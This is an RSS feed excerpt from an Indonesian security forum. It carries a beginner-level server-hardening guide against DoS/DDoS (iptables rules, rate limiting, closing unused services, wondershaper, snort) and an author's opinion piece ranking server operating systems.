Yang ke lima adalah bagaimana caranya agar koneksi yang di terima pada server bisa kita limit.<br />
Karena secara default, bandwidth koneksi yang di gunakan itu rata" tanpa ada batasan ukurannya.<br />
Di sini kita akan coba me limit bandwidth yang akan kita gunakan menggunakan aplikasi wondershaper.<br />
Untuk installasi nya cukup mudah, kita tinggal mengetik saja perintah ini di terminal.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; apt install make<br />
&#36; git clone https://github.com/magnific0/wondershaper<br />
&#36; cd wondershaper<br />
&#36; make install<br />
&#36; chmod +x /usr/bin/wondershaper<br />
&#36; systemctl enable wondershaper</code></div></div><br />
Setelah installasi selesai, kita tinggal menyesuaikan interface yang di pakai, kecepatan download dan upload pada setingan wondershaper dengan mengedit file /etc/conf.d/wondershaper.conf kemudian mengaktifkan service nya.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; nano /etc/conf.d/wondershaper.conf<br />
&#36; cat /etc/conf.d/wondershaper.conf<br />
[wondershaper]<br />
IFACE="ens3"<br />
DSPEED="2048"<br />
USPEED="2048"<br />
&#36; systemctl start wondershaper</code></div></div><br />
Kemudian jika kita ingin mengecek apakah wondershaper nya sudah bekerja dengan baik, kita bisa cek menggunakan aplikasi speedtest di terminal.<br />
<br />
<img src="https://i.ibb.co/58bnyyZ/Screenshot-2019-05-09-05-45-30.png" alt="[Image: Screenshot-2019-05-09-05-45-30.png]" class="mycode_img" /><br />
<br />
Kenapa hal ini harus kita lakukan??<br />
Karena sebagai kita ketahui bahwa service DDOS itu bisa di beli secara online, dan bisa di jalankan juga tanpa menggunakan koneksi yang kita pakai.<br />
Sehingga serangan yang di hasilkan bisa sangat besar jika server kita tidak di batasi bandwidth nya.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Keenam:</span><br />
Dan yang terakhir adalah memasang IDS dan IPS pada web server.<br />
Cara ini cukup mudah juga dalam proses installasinya, kita tinggal install saja aplikasi snort di terminal server kita.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; apt install snort</code></div></div><br />
Setelah proses installasi selesai, snort akan berjalan secara otomatis di system.<br />
Dia juga akan menganalisa setiap request yang masuk apakah request tersebut mencurigakan atau tidak.<br />
Kemudian hasil analisa tersebut akan masuk ke dalam log server untuk di analisa oleh kita.<br />
Selain itu juga kita bisa membuat rule sendiri untuk pengamanan pada server kita.<br />
<br />
Mungkin cukup sekian pembahasan kali ini tentang cara meminimalisir serangan DOS/DDOS pada server.<br />
Kurang lebih nya mohon, di maklumi.<br />
Karena saya sendiri pun masih belajar dan mendalami bagaimana cara mengamankan server dari berbagai serangan.<br />
Next saya akan melanjutkan tulisan berikutnya.<br />
<br />
Sekian...]]></description>
			<content:encoded><![CDATA[Hallo kembali lagi dengan saya di sini,<br />
Untuk melanjutkan artikel sebelumnya tentang <a href="https://www.backboxindonesia.or.id/thread-244.html" target="_blank" class="mycode_url">cara mengamankan server dari berbagai serangan</a>.<br />
Di post kali ini saya akan membahas bagaimana cara meminimalisir serangan DOS/DDOS pada server yang kita kelola secara teknisnya.<br />
Yang akan kita bahas kali ini adalah:<br />
<br />
<ol type="1" class="mycode_list">
</li>
<li>Blok traffic masuk ICMP<br />
</li>
<li>Blok IP yang di sinyalir membahayakan server dengan iptables<br />
</li>
<li>Batasi jumlah traffic masuk pada server<br />
</li>
<li>Tutup port yang tidak di perlukan<br />
</li>
<li>Batasi ukuran file yang di upload<br />
</li>
<li>Pasang IDS &amp; IPS untuk meminimalisir serangan<br />
</li></ol>
<br />
<span style="font-weight: bold;" class="mycode_b">Pertama:</span><br />
Oke langsung saja ke bahasan pertama yaitu mem blok traffic masuk ICMP.<br />
Kenapa ICMP harus di batasi??<br />
Karena perlu kita ketahui juga dalam serangan DOS/DDOS itu ada namanya teknik "Ping of death" atau bisa di sebut sebagai serangan yang di tujukan pada protokol ICMP.<br />
Untuk cara menangkalnya cukup mudah, kita hanya menambahkan rule iptables saja.<br />
Tetapi sebelum mengeksekusi perintahnya kita harus menggunakan user <span style="color: #ff3333;" class="mycode_color">root</span> terlebih dahulu.<br />
Perintahnya kurang lebih seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -A INPUT -p icmp --icmp-type echo-request -j DROP</code></div></div><br />
dan jika kalian ingin menghapus rute tersebut cukup mengganti "-A" menjadi "-D".<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -D INPUT -p icmp --icmp-type echo-request -j DROP</code></div></div><br />
Cukup mudah bukan?? :)<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Kedua:</span><br />
Oke kita lanjut ke pembahasan kedua, yaitu membloking ip address yang di sinyalir membahayakan server.<br />
Seperti biasa tools yang di gunakan masih menggunakan iptables.<br />
Perintahnya serperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -A INPUT -s ipaddress -j DROP</code></div></div><br />
Sebagai contoh kita akan memblok ip 1.1.1.1, dan perintahnya seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -A INPUT -s 1.1.1.1 -j DROP</code></div></div><br />
Seperti pembahasan di atas, jika kita ingin meng unblock tinggal mengganti "-A" menjadi "-D".<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -D INPUT -s 1.1.1.1 -j DROP</code></div></div><br />
Sudah mulai sedikit paham dengan iptables?? :)<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Ketiga:</span><br />
Lanjut ke pembahasan ke tiga yaitu tentang cara membatasi maksimal request yang masuk.<br />
Kali ini masih seputar iptables, dan tidak perlu lagi seting di webserver.<br />
Tujuannya yaitu menghidari bruteforce, DOS/DDOS pada web server, dan bisa juga di terapkan ke service yang lain.<br />
Sebagai contoh bisa di terapkan juga ke port ssh agar tidak terjadi serangan bruterforce secara berturut turut.<br />
Ketika ada salah satu ip yang mencoba mem bruteforce maka ip tersebut akan di block oleh iptables untuk sementara.<br />
Perintahnya kurang lebih seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -I INPUT -p tcp --dport [port] -i [interface] -m state --state NEW -m recent --set<br />
&#36; iptables -I INPUT -p tcp --dport [port] -i [interface] -m state --state NEW -m recent  --update --seconds [waktu] --hitcount 4 -j DROP</code></div></div><br />
Keterangan:<br />
[port] = port yang akan kita batasi koneksinya<br />
[interface] = interface jaringan yang di gunakan pada server<br />
[waktu] = waktu tunggu setelah di blok oleh ip tables<br />
<br />
Sebagai contoh apabila di server kita mempunyai 3 port yang di buka maka perintahnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables -I INPUT -p tcp --dport 22 -i ens3 -m state --state NEW -m recent --set<br />
&#36; iptables -I INPUT -p tcp --dport 80 -i ens3 -m state --state NEW -m recent --set<br />
&#36; iptables -I INPUT -p tcp --dport 443 -i ens3 -m state --state NEW -m recent --set<br />
&#36; iptables -I INPUT -p tcp --dport 22 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP<br />
&#36; iptables -I INPUT -p tcp --dport 80 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP<br />
&#36; iptables -I INPUT -p tcp --dport 443 -i ens3 -m state --state NEW -m recent  --update --seconds 60 --hitcount 4 -j DROP</code></div></div><br />
Port 22 = SSH<br />
Port 80 = Web server<br />
Port 443 = Web server<br />
ens3 = Interface jaringan<br />
<br />
Kurang lebih seperti itu teknisnya dalam membatasi koneksi yang masuk pada server menggunakan iptables.<br />
Dan jangan lupa juga kalau kita sudah menginput rule iptables di atas, kita harus menyimpan rule tersebut dengan perintah iptables-save.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; iptables-save</code></div></div><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Keempat:</span><br />
Untuk tahap ke empat yaitu menutup port yang tidak terpakai.<br />
Kali ini caranya agak sedikit berbeda, yang di mana sebelum mematikan service kita harus mengecek terlebih dahulu port yang terbuka dengan netstat.<br />
Perintah dasarnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; netstat -ntlp</code></div></div><br />
Untuk melihat service apa saja yang di jalankan, kita harus menggunakan user root agar bisa terlihar name servicenya.<br />
Karena kalo kita menjalankan netstat menggunakan user biasa, nama service dan nomer pid nya tidak akan muncul di outputnya.<br />
<br />
Setelah kita mengetahui pid dan port mana yang tidak terpakai, tahap selanjutnya adalah memberhentikan service tersebut.<br />
Sebagai contoh<br />
<br />
<img src="https://i.ibb.co/FmbT02L/Screenshot-2019-05-08-20-20-41.png" alt="[Image: Screenshot-2019-05-08-20-20-41.png]" class="mycode_img" /><br />
<br />
Di gambar tersebut terlihat service haproxy dan python yang sedang berjalan tetapi proses tersebut sebenernya tidak terpakai.<br />
Selain itu juga port 31337 itu adalah port backdoor (bind shell), dan ini yang akan menyebabkan server kita menjadi tidak aman.<br />
Untuk cara memberhentikan service dan backdoor tersebut ada banyak cara, yang pertama memberhentikan terlebih dahulu service haproxy yang sedang berjalan dengan cara seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; /etc/init.d/haproxy stop<br />
<br />
atau<br />
<br />
&#36; systemctl stop haproxy</code></div></div><br />
Kemudian cara selanjutnya yaitu mendisable service tersebut saat restart dengan perintah ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; systemctl disable haproxy</code></div></div><br />
Selanjutnya jika service yang berjalan tidak ada di dalam systemctl atau init.d kita bisa mematikan proses secara paksa dengan perintah ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; kill -9 &lt;pid&gt;</code></div></div><br />
&lt;pid&gt; ini adalah pid proses yang keluar di dalam output netstat tadi, sebagai contoh pid yang menjalankan python yaitu 5615 dan perintahnya seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; kill -9 5615</code></div></div><br />
Kalo kalian sudah terbiasa dengan perintah linux pastinya cara ini sangat mudah di lakukan. :)<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Kelima:</span><br />
Yang ke lima adalah bagaimana caranya agar koneksi yang di terima pada server bisa kita limit.<br />
Karena secara default, bandwidth koneksi yang di gunakan itu rata" tanpa ada batasan ukurannya.<br />
Di sini kita akan coba me limit bandwidth yang akan kita gunakan menggunakan aplikasi wondershaper.<br />
Untuk installasi nya cukup mudah, kita tinggal mengetik saja perintah ini di terminal.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; apt install make<br />
&#36; git clone https://github.com/magnific0/wondershaper<br />
&#36; cd wondershaper<br />
&#36; make install<br />
&#36; chmod +x /usr/bin/wondershaper<br />
&#36; systemctl enable wondershaper</code></div></div><br />
Setelah installasi selesai, kita tinggal menyesuaikan interface yang di pakai, kecepatan download dan upload pada setingan wondershaper dengan mengedit file /etc/conf.d/wondershaper.conf kemudian mengaktifkan service nya.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; nano /etc/conf.d/wondershaper.conf<br />
&#36; cat /etc/conf.d/wondershaper.conf<br />
[wondershaper]<br />
IFACE="ens3"<br />
DSPEED="2048"<br />
USPEED="2048"<br />
&#36; systemctl start wondershaper</code></div></div><br />
Kemudian jika kita ingin mengecek apakah wondershaper nya sudah bekerja dengan baik, kita bisa cek menggunakan aplikasi speedtest di terminal.<br />
<br />
<img src="https://i.ibb.co/58bnyyZ/Screenshot-2019-05-09-05-45-30.png" alt="[Image: Screenshot-2019-05-09-05-45-30.png]" class="mycode_img" /><br />
<br />
Kenapa hal ini harus kita lakukan??<br />
Karena sebagai kita ketahui bahwa service DDOS itu bisa di beli secara online, dan bisa di jalankan juga tanpa menggunakan koneksi yang kita pakai.<br />
Sehingga serangan yang di hasilkan bisa sangat besar jika server kita tidak di batasi bandwidth nya.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Keenam:</span><br />
Dan yang terakhir adalah memasang IDS dan IPS pada web server.<br />
Cara ini cukup mudah juga dalam proses installasinya, kita tinggal install saja aplikasi snort di terminal server kita.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; apt install snort</code></div></div><br />
Setelah proses installasi selesai, snort akan berjalan secara otomatis di system.<br />
Dia juga akan menganalisa setiap request yang masuk apakah request tersebut mencurigakan atau tidak.<br />
Kemudian hasil analisa tersebut akan masuk ke dalam log server untuk di analisa oleh kita.<br />
Selain itu juga kita bisa membuat rule sendiri untuk pengamanan pada server kita.<br />
<br />
Mungkin cukup sekian pembahasan kali ini tentang cara meminimalisir serangan DOS/DDOS pada server.<br />
Kurang lebih nya mohon, di maklumi.<br />
Karena saya sendiri pun masih belajar dan mendalami bagaimana cara mengamankan server dari berbagai serangan.<br />
Next saya akan melanjutkan tulisan berikutnya.<br />
<br />
Sekian...]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cara mengamankan server dari berbagai serangan]]></title>
			<link>https://www.backboxindonesia.or.id/thread-244.html</link>
			<pubDate>Tue, 07 May 2019 07:04:09 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-244.html</guid>
			<description><![CDATA[Halo guys, ini adalah postingan pertama saya di sini.<br />
Kali ini saya akan membahas bermaca macam cara agar server yang kita kelola benar" aman dari segala serangan keamana yang sudah banyak di publish dalam beberapa dekade ini.<br />
Saya sedikit miris juga dengan banyaknya perusahaan dan instansi yang menganggap kerentanan keamanan itu sangat sepele.<br />
Selain itu minim sekali artikel yang membahas tentang cara mengamankan berbagai serangan secara teknis, sedangkan serangan keamanan sendiri telah banyak di ketahui banyak orang dalam beberapa tahun kebelakang ini.<br />
Saya asumsikan orang-orang tersebut adalah wanna be hacker.<br />
<br />
Mungkin di artikel ini saya akan menjelaskan sedikit tentang hal yang perlu kita pertimbangkan sebelum memulai ke topik yang sangat utama dalam artikel ini.<br />
Sebelum memulai ke pembahasan yang lebih rinci alangkah baiknya kita mengetahui dulu hal-hal yang fundamental dalam membangun suatu system.<br />
Hal pertama yang harus kita pikirkan adalah memilih system operasi terbaik dari yang terbaik.<br />
<br />
Perlu kita ketahui bahwa system operasi di dunia ini sangatlah banyak, maka dari itu kita harus memilih system operasi terbaik agar mendapatkan hasil yang baik juga dalam segi kemampuan dalam menghandle setiap proses yang akan kita jalankan kedepannya.<br />
Untuk membuktikan bahwa system operasi terbaik itu adalah dengan mencoba semua system operasi kemudian mencoba satu persatu kemampuannya sampai di mana, serta pergerakan aplikasi yang di gunakan apakah selalu update setiap saat, kemudian apakah system operasi tersebut bisa menahan setiap serangan atau tidak.<br />
Kalau kita sudah mencoba sendiri semua system operasi dan mencoba pengetesan serangan, aplikasi dan lain lain, kita tidak akan pernah terhasut lagi oleh orang-orang yang fanatik terhadap salah satu system operasi, kemudian mendewa dewakan system operasi tersebut. h3h3<br />
Karena ini sangat penting bagi kalian jika memang ingin membangun system yang benar-benar aman dari segala macam serangan.<br />
<br />
Saya akan sedikit bercerita tentang penelitian saya dulu tentang system operasi yang terbaik itu seperti apa.<br />
Mungkin tepatnya 1,5 tahun kebelakang sejak postingan ini di publish saya pernah meneliti system operasi dengan mencoba semua system operasi yang bisa di jadikan sebagi server serperti OpenBSD, FreeBSD, Redhat, Fedora, Centos, Ubuntu, Debian, Slackware, Gentoo, Arch, Alpine, windows, dll.<br />
Dari semua system operasi itu cuma ada beberapa system operasi yang bisa menghandle serangan DOS/DDOS, selebihnya tidak bisa meng handle.<br />
Saya sebut saja system operasi yang di maksud adalah<br />
<br />
<ul class="mycode_list">
</li>
<li>OpenBSD<br />
</li>
<li>Redhat<br />
</li>
<li>dan Fedora<br />
</li></ul>
<br />
Dan untuk system operasi dengan aplikasi default dan repository yang selalu update urutannya adalah<br />
<br />
<ul class="mycode_list">
</li>
<li>Archlinux<br />
</li>
<li>OpenBSD<br />
</li>
<li>Redhat<br />
</li>
<li>dan Fedora<br />
</li></ul>
<br />
Dari statement saya ini kalian boleh percaya atau tidak, yang pasti ini adalah hasil dari penelitian saya tentang pemilihan system operasi, yang pada saat itu juga saya membangun system linux sendiri dari awal (LFS) di perusahaan yang pernah saya tempati.<br />
Jika kalian Ingin menggunakan system operasi yang paling aman untuk server, saya menyarankan menggunakan OpenBSD.<br />
Hal ini di dukung juga oleh banyaknya artilkel yang menyebutkan bahwa <span style="color: #ff9933;" class="mycode_color">OpenBSD adalah system operasi ter aman nomer 1</span> di antara system operasi yang lain.<br />
Kenapa OpenBSD??<br />
Saya sudah mencoba juga bahwa OpenBSD sendiri selain bisa menghandle DOS/DDOS, path system yang di gunakan seperti folder /etc/ dll tidak dapat tampil dan di baca dalam mode web server atau backdoor sekalipun. Jadi hanya folder web server saja yang dapat di akses secara umum.<br />
Hal ini yang menunjukan bahwa openbsd bisa meminimalisir exploitasi kernel yang di gunakannya.<br />
Selain itu juga config yang di gunakan dari beberapa aplikasi web server sudah di set dengan konfigurasi terbaik, sebagai contoh kecilnya di aplikasi nginx.<br />
Yang di mana setingan default <span style="color: #3366ff;" class="mycode_color">server_token</span> di set menjadi <span style="color: #3366ff;" class="mycode_color">off</span>.<br />
Tujuannya yaitu untuk menyembunyikan versi nginx yang di gunakan pada system OpenBSD.<br />
Artinya setiap orang yang me request ke server tidak dapat mengetahui versi nginx yang di gunakan pada server.<br />
Dan itu salah satu contoh kecil yang nyata kalau OpenBSD itu system operasi yang aman secara default.<br />
Sampai sekarang pun saya menggunakan OpenBSD sebagai system operasi default untuk production.<br />
<br />
Kemudian jika kalian bekerja di korporasi atau pemerintahan yang agak sedikit sulit mengoperasikan OpenBSD, kalian bisa menggunakan <span style="color: #ff3333;" class="mycode_color">Redhat Enterprise sebagai system operasi terbaik nomor 2</span> dengan dukungan enterprise dari website official nya langsung.<br />
Kenapa harus menggunakan Redhat??<br />
Karena Redhat adalah salah satu system operasi enterprise yang punya banyak dukungan dalam mengupdate setiap aplikasi dan library, selain itu juga update yang di berikan juga sangat cepat tanggap jika menemukan bug yang sangat kritikal.<br />
System operasi ini lah yang paling cocok untuk server setingkat korporasi atau pemerintahan versi saya sendiri.<br />
Saya punya keinginan juga kalo di indonesia ini kedepannya mewajibkan menggunakan Redhat Enterprise sebagai system operasi standart untuk kebutuhan server di level korporasi dan pemerintahan. :)<br />
<br />
Tetapi apabila kalian tidak punya cukup kocek untuk dukungan enterprise Redhat, kalian juga bisa mencoba system operasi yang free dan opensource yaitu <span style="color: #3399ff;" class="mycode_color">Fedora sebagai system operasi terbaik ke 3</span>.<br />
Kenapa fedora dan bukan centos?? Centos juga kan turunan dari Redhat Enterprise??<br />
Perlu saya sampaikan juga kalo Fedora itu sudah terpasang kernel, library, dan aplikasi yang paling update di antara turuna redhat yang lainnya (coba buktikan sendiri).<br />
Selain itu juga Fedora sudah di seting secara default untuk bisa menghandle serangan DOS/DDOS.<br />
Dan ini lah alasan fundamental saya kenapa saya lebih suka fedora daripada turunan redhat yang lain.<br />
<br />
Dari penjelasan singkat ini saya hanya ingin menyampaikan kalau statement saya bisa saja salah, dan bisa saja benar.<br />
Tapi tidak luput dari hal itu kalian bisa coba buktikan sendiri yang mana system operasi terbaik menurut versi kalian.<br />
Di sini saya hanya mencoba menyampaikan apa yang telah saya teliti dan saya buktikan sendiri.<br />
Selebihnya kalian bisa menilai sendiri. :)<br />
<br />
Kembali ke bahasan awal yaitu apa dan bagaimana teknik untuk mengamankan server dari berbagai serangan.<br />
Kali ini saya akan menjelaskan secara teknis menggunakan system operasi yang sangat banyak di gunakan oleh orang orang di dunia yaitu menggunakan <span style="color: #ff6633;" class="mycode_color">Ubuntu</span> sebagai dasar untuk pengamanan server.<br />
Kenapa saya menggunakan Ubuntu dalam praktek pengamanannya??<br />
Tugas saya kali ini adalah meng edukasi kepada setiap sysadmin yang telah terlanjur menggunakan ubuntu atau debian sebagai system operasi dasar yang di gunakan untuk kebutuhan server, walaupun saya sendiri menggunakan OpenBSD sebagai system operasi default untuk kebutuhan server yang saya kelola.<br />
Selain itu juga setingan Ubuntu yang harus di rubah lebih kompleks daripada setingan OpenBSD sendiri.<br />
Karena di OpenBSD sudah ter seting keamana secara default, kita hanya tinggal seting sedikit saja untuk mendapatkan hasil yang lebih baik.<br />
<br />
Kedepannya saya akan menjelaskan beberapa judul yang telah saya tulis di bawah yaitu:<br />
<br />
A. <a href="https://www.backboxindonesia.or.id/thread-245.html" target="_blank" class="mycode_url">Meminimalisir serangan dos/ddos pada server</a><br />
<ol type="1" class="mycode_list">
</li>
<li>Blok traffic masuk ICMP<br />
</li>
<li>Blok IP yang di sinyalir membahayakan server dengan iptables<br />
</li>
<li>Batasi jumlah traffic masuk pada server<br />
</li>
<li>Tutup port yang tidak di perlukan<br />
</li>
<li>Batasi ukuran file yang di upload<br />
</li>
<li>Pasang IDS &amp; IPS untuk meminimalisir serangan<br />
</li></ol>
<br />
B. Menangkal serangan bruteforce<br />
<ol type="1" class="mycode_list">
</li>
<li>Jangan izinkan user root masuk ke dalam ssh atau gunakan user biasa untuk login ke ssh<br />
</li>
<li>Gunakan private key yang di password untuk login ke ssh<br />
</li>
<li>Ganti port default ssh menjadi port random<br />
</li>
<li>Batasi pengecekan password yang salah dengan fail2ban<br />
</li>
<li>Usahakan password yang di gunakan tidak mudah di tebak<br />
</li>
<li>Segala hal yang berhubungan dengan password harus di bedakan<br />
</li></ol>
<br />
C. Meningkatkan keamanan pada aplikasi yang di pakai<br />
<ol type="1" class="mycode_list">
</li>
<li>Enkripsi setiap script config database yang di gunakan di server atau pindahkan ke folder yang tidak biasanya<br />
</li>
<li>Gunakan ssl di dalam webserver<br />
</li>
<li>Jangan simpan private key di dalam server<br />
</li>
<li>Jangan simpan file backup di dokumen publik webserver<br />
</li>
<li>Rubah alamat phpmyadmin jadi alamat acak<br />
</li>
<li>Rubah alamat login admin jadi alamat acak<br />
</li>
<li>Gunakan OTP untuk login ke dalam aplikasi <br />
</li>
<li>Filter semua POST dan GET yang ada dalam aplikasi<br />
</li></ol>
<br />
D. Meningkatkan keamana jaringan pada server<br />
<ol type="1" class="mycode_list">
</li>
<li>Batasi koneksi outgoing menggunakan iptables<br />
</li>
<li>Nonaktifkan DNS di /etc/resolv.conf<br />
</li>
<li>Hanya izinkan port yang terbuka saja yang bisa di akses publik menggunakan ufw/iptables<br />
</li>
<li>Jangan buka port database ke publik<br />
</li>
<li>Gunakan 1 ip gateway, 1 ip netmask, 1 ip broadcast, 1 ip address, dan 1 vlan untuk 1 aplikasi<br />
</li></ol>
<br />
E. Meningkatkan keamanan pada server<br />
<ol type="1" class="mycode_list">
</li>
<li>Selalu update system operasi yang sedang di gunakan<br />
</li>
<li>Sembunyikan versi PHP, apache, dll di header<br />
</li>
<li>Non aktifkan directory listing di webserver<br />
</li>
<li>Disable shell pada user web server "www-data" di /etc/passwd<br />
</li>
<li>Non aktifkan fungsi execute command seperti exec, passthru, php-cgi kalo tidak di perlukan<br />
</li>
<li>Di history command jangan tertinggal password apapun<br />
</li></ol>
<br />
F. Monitoring server untuk meningkatkan keamanan<br />
<ol type="1" class="mycode_list">
</li>
<li>Selalu cek log aktivitas server (monitoring)<br />
</li>
<li>Cek cronjob atau crontab setiap waktu di setiap user<br />
</li>
<li>Cek setiap service yang berjalan agar tidak terjadi misconfigurasi<br />
</li>
<li>Pasang alamat admin palsu (honeypot)<br />
</li></ol>
<br />
Untuk kelanjutan artikel kali ini saya akan post di thread yang berbeda.<br />
Tunggu saja updatean selanjutnya.<br />
Sekian.. ;)]]></description>
			<content:encoded><![CDATA[Halo guys, ini adalah postingan pertama saya di sini.<br />
Kali ini saya akan membahas bermaca macam cara agar server yang kita kelola benar" aman dari segala serangan keamana yang sudah banyak di publish dalam beberapa dekade ini.<br />
Saya sedikit miris juga dengan banyaknya perusahaan dan instansi yang menganggap kerentanan keamanan itu sangat sepele.<br />
Selain itu minim sekali artikel yang membahas tentang cara mengamankan berbagai serangan secara teknis, sedangkan serangan keamanan sendiri telah banyak di ketahui banyak orang dalam beberapa tahun kebelakang ini.<br />
Saya asumsikan orang-orang tersebut adalah wanna be hacker.<br />
<br />
Mungkin di artikel ini saya akan menjelaskan sedikit tentang hal yang perlu kita pertimbangkan sebelum memulai ke topik yang sangat utama dalam artikel ini.<br />
Sebelum memulai ke pembahasan yang lebih rinci alangkah baiknya kita mengetahui dulu hal-hal yang fundamental dalam membangun suatu system.<br />
Hal pertama yang harus kita pikirkan adalah memilih system operasi terbaik dari yang terbaik.<br />
<br />
Perlu kita ketahui bahwa system operasi di dunia ini sangatlah banyak, maka dari itu kita harus memilih system operasi terbaik agar mendapatkan hasil yang baik juga dalam segi kemampuan dalam menghandle setiap proses yang akan kita jalankan kedepannya.<br />
Untuk membuktikan bahwa system operasi terbaik itu adalah dengan mencoba semua system operasi kemudian mencoba satu persatu kemampuannya sampai di mana, serta pergerakan aplikasi yang di gunakan apakah selalu update setiap saat, kemudian apakah system operasi tersebut bisa menahan setiap serangan atau tidak.<br />
Kalau kita sudah mencoba sendiri semua system operasi dan mencoba pengetesan serangan, aplikasi dan lain lain, kita tidak akan pernah terhasut lagi oleh orang-orang yang fanatik terhadap salah satu system operasi, kemudian mendewa dewakan system operasi tersebut. h3h3<br />
Karena ini sangat penting bagi kalian jika memang ingin membangun system yang benar-benar aman dari segala macam serangan.<br />
<br />
Saya akan sedikit bercerita tentang penelitian saya dulu tentang system operasi yang terbaik itu seperti apa.<br />
Mungkin tepatnya 1,5 tahun kebelakang sejak postingan ini di publish saya pernah meneliti system operasi dengan mencoba semua system operasi yang bisa di jadikan sebagi server serperti OpenBSD, FreeBSD, Redhat, Fedora, Centos, Ubuntu, Debian, Slackware, Gentoo, Arch, Alpine, windows, dll.<br />
Dari semua system operasi itu cuma ada beberapa system operasi yang bisa menghandle serangan DOS/DDOS, selebihnya tidak bisa meng handle.<br />
Saya sebut saja system operasi yang di maksud adalah<br />
<br />
<ul class="mycode_list">
</li>
<li>OpenBSD<br />
</li>
<li>Redhat<br />
</li>
<li>dan Fedora<br />
</li></ul>
<br />
Dan untuk system operasi dengan aplikasi default dan repository yang selalu update urutannya adalah<br />
<br />
<ul class="mycode_list">
</li>
<li>Archlinux<br />
</li>
<li>OpenBSD<br />
</li>
<li>Redhat<br />
</li>
<li>dan Fedora<br />
</li></ul>
<br />
Dari statement saya ini kalian boleh percaya atau tidak, yang pasti ini adalah hasil dari penelitian saya tentang pemilihan system operasi, yang pada saat itu juga saya membangun system linux sendiri dari awal (LFS) di perusahaan yang pernah saya tempati.<br />
Jika kalian Ingin menggunakan system operasi yang paling aman untuk server, saya menyarankan menggunakan OpenBSD.<br />
Hal ini di dukung juga oleh banyaknya artilkel yang menyebutkan bahwa <span style="color: #ff9933;" class="mycode_color">OpenBSD adalah system operasi ter aman nomer 1</span> di antara system operasi yang lain.<br />
Kenapa OpenBSD??<br />
Saya sudah mencoba juga bahwa OpenBSD sendiri selain bisa menghandle DOS/DDOS, path system yang di gunakan seperti folder /etc/ dll tidak dapat tampil dan di baca dalam mode web server atau backdoor sekalipun. Jadi hanya folder web server saja yang dapat di akses secara umum.<br />
Hal ini yang menunjukan bahwa openbsd bisa meminimalisir exploitasi kernel yang di gunakannya.<br />
Selain itu juga config yang di gunakan dari beberapa aplikasi web server sudah di set dengan konfigurasi terbaik, sebagai contoh kecilnya di aplikasi nginx.<br />
Yang di mana setingan default <span style="color: #3366ff;" class="mycode_color">server_token</span> di set menjadi <span style="color: #3366ff;" class="mycode_color">off</span>.<br />
Tujuannya yaitu untuk menyembunyikan versi nginx yang di gunakan pada system OpenBSD.<br />
Artinya setiap orang yang me request ke server tidak dapat mengetahui versi nginx yang di gunakan pada server.<br />
Dan itu salah satu contoh kecil yang nyata kalau OpenBSD itu system operasi yang aman secara default.<br />
Sampai sekarang pun saya menggunakan OpenBSD sebagai system operasi default untuk production.<br />
<br />
Kemudian jika kalian bekerja di korporasi atau pemerintahan yang agak sedikit sulit mengoperasikan OpenBSD, kalian bisa menggunakan <span style="color: #ff3333;" class="mycode_color">Redhat Enterprise sebagai system operasi terbaik nomor 2</span> dengan dukungan enterprise dari website official nya langsung.<br />
Kenapa harus menggunakan Redhat??<br />
Karena Redhat adalah salah satu system operasi enterprise yang punya banyak dukungan dalam mengupdate setiap aplikasi dan library, selain itu juga update yang di berikan juga sangat cepat tanggap jika menemukan bug yang sangat kritikal.<br />
System operasi ini lah yang paling cocok untuk server setingkat korporasi atau pemerintahan versi saya sendiri.<br />
Saya punya keinginan juga kalo di indonesia ini kedepannya mewajibkan menggunakan Redhat Enterprise sebagai system operasi standart untuk kebutuhan server di level korporasi dan pemerintahan. :)<br />
<br />
Tetapi apabila kalian tidak punya cukup kocek untuk dukungan enterprise Redhat, kalian juga bisa mencoba system operasi yang free dan opensource yaitu <span style="color: #3399ff;" class="mycode_color">Fedora sebagai system operasi terbaik ke 3</span>.<br />
Kenapa fedora dan bukan centos?? Centos juga kan turunan dari Redhat Enterprise??<br />
Perlu saya sampaikan juga kalo Fedora itu sudah terpasang kernel, library, dan aplikasi yang paling update di antara turuna redhat yang lainnya (coba buktikan sendiri).<br />
Selain itu juga Fedora sudah di seting secara default untuk bisa menghandle serangan DOS/DDOS.<br />
